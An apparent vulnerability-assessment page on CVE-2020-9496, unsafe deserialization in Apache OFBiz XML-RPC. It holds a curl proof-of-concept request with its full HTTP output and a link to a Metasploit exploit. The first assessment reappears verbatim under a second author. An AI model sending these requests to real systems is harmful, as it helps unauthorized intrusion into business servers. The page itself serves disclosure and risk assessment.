CVE-2020-9496

XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03

Recent assessments:

wvu-r7 at August 13, 2020 8:00pm UTC reported:

Pre-auth RCE in ERP software that’s free and isn’t SAP? Sweet. And it’s a long-standing Apache project that’s often recommended. Here’s a PoC:

wvu@kharak:~$ curl -vH "Content-Type: text/xml" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version="1.0"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>'
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST /webtools/control/xmlrpc HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Type: text/xml
> Content-Length: 273
>
* upload completely sent off: 273 out of 273 bytes
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly
< Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/
< Content-Type: text/xml;charset=UTF-8
< Transfer-Encoding: chunked
< Vary: Accept-Encoding
< Date: Thu, 13 Aug 2020 19:57:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact
<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0
wvu@kharak:~$

A lot of orgs rely on ERP software, and you’re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I’d say.

Note that the CVE seems to conflate this with XSS. CVSS score seems lower than I’d expect.

ETA: Here’s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000&gt;.

pbarry-r7 at August 24, 2020 3:13am UTC reported:

Pre-auth RCE in ERP software that’s free and isn’t SAP? Sweet. And it’s a long-standing Apache project that’s often recommended. Here’s a PoC:

wvu@kharak:~$ curl -vH "Content-Type: text/xml" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version="1.0"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>'
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST /webtools/control/xmlrpc HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Type: text/xml
> Content-Length: 273
>
* upload completely sent off: 273 out of 273 bytes
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly
< Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/
< Content-Type: text/xml;charset=UTF-8
< Transfer-Encoding: chunked
< Vary: Accept-Encoding
< Date: Thu, 13 Aug 2020 19:57:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact
<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0
wvu@kharak:~$

A lot of orgs rely on ERP software, and you’re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I’d say.

Note that the CVE seems to conflate this with XSS. CVSS score seems lower than I’d expect.

ETA: Here’s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000&gt;.

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5